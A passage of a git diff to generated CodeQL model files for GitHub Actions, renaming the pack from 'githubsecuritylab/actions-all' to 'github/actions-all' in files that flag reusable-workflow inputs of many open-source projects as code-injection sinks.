diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml index 449ea8b7b49..ab486b47df2 100644 --- a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml index 6656d42c4e6..dc402bc1e45 100644 --- a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml index 6e7fdc34a54..b5d4d6e4bde 100644 --- a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml index 8fc02a27e1c..83b45112b86 100644 --- a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml index 80f19676b4a..c40044c852e 100644 --- a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml index 56b2ef6691e..01178790847 100644 --- a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml index 7bc952a8483..9593323f325 100644 --- a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml index 1c0663dd01c..7901da27836 100644 --- a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml index 4da8f327662..ccb1bd24654 100644 --- a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml index 4e8adfafe3c..8317fdabab0 100644 --- a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml index 28cb702ce13..529e1576e74 100644 --- a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml index cb315ee4328..d659fbc8089 100644 --- a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml index 956c4cba966..9ca03d9aee1 100644 --- a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml index 804c1bdae4e..725487f1005 100644 --- a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml index 78d91b2afb5..2bda8bb60a5 100644 --- a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml index 31cadc3ff17..e91b615cbe6 100644 --- a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml index 11362fda1e5..e09e461e605 100644 --- a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml index 131cff3e92a..f8dd54aee14 100644 --- a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml index acc5bf51e35..c4aaa28f00b 100644 
--- a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml index c89d1c808c3..546dac977a8 100644 --- a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml index 0258c79e83f..3a072fd9f07 100644 --- a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml index ebeba1eb226..08a5f8fc58e 100644 --- a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml index 5f709385839..299c70daa54 100644 --- a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml index e96dbba0699..3e03b65cb8b 100644 --- a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml index 2a7a9afd5a6..20eb977b973 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml index 5094422f3fe..4e58b2fa38c 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml index dff83745645..6935bc7788d 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml index 88b68dc4ea7..94d733fa0c4 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml index 18c6974c74f..6b1214886fe 100644 --- a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml index 561c3e15e64..4a97c50ad6e 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml index 961741f413f..a6e4c3473f2 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml index 985652a265b..be72ba18357 100644 --- a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml index 3103913ab4f..5f4a4a09cd0 100644 --- a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml index b89c1307d2d..4cadb751d75 100644 --- a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml index 9e60cc61bb5..1257c67c180 100644 --- a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml index cac4e298538..f0daee8757e 100644 --- a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml index eb2669a96ea..85d3b564a78 100644 --- a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml index 590e518d350..01bda56c9a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml index d55af595b1c..4c9e9b1dc8f 100644 --- a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml index 1fd6cd394bc..30e54f94fc1 100644 --- a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml index 3583052045b..bb0c172bf0e 100644 --- a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml index f355ceee6da..3a5ad21b22a 100644 --- a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml index 2b9190c87af..c161072bd3d 100644 --- a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml index 783ff3c0468..0362312f27a 100644 --- a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml index de853d30588..2ae5aab3b2c 100644 --- a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml index 31f09278ecd..e2c8ae625c2 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml index d45a2e2a03a..13461b60205 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml index 896400bf2f1..88e02dd04c4 100644 --- a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml index ade06c90c26..2f368497f01 100644 --- a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml 
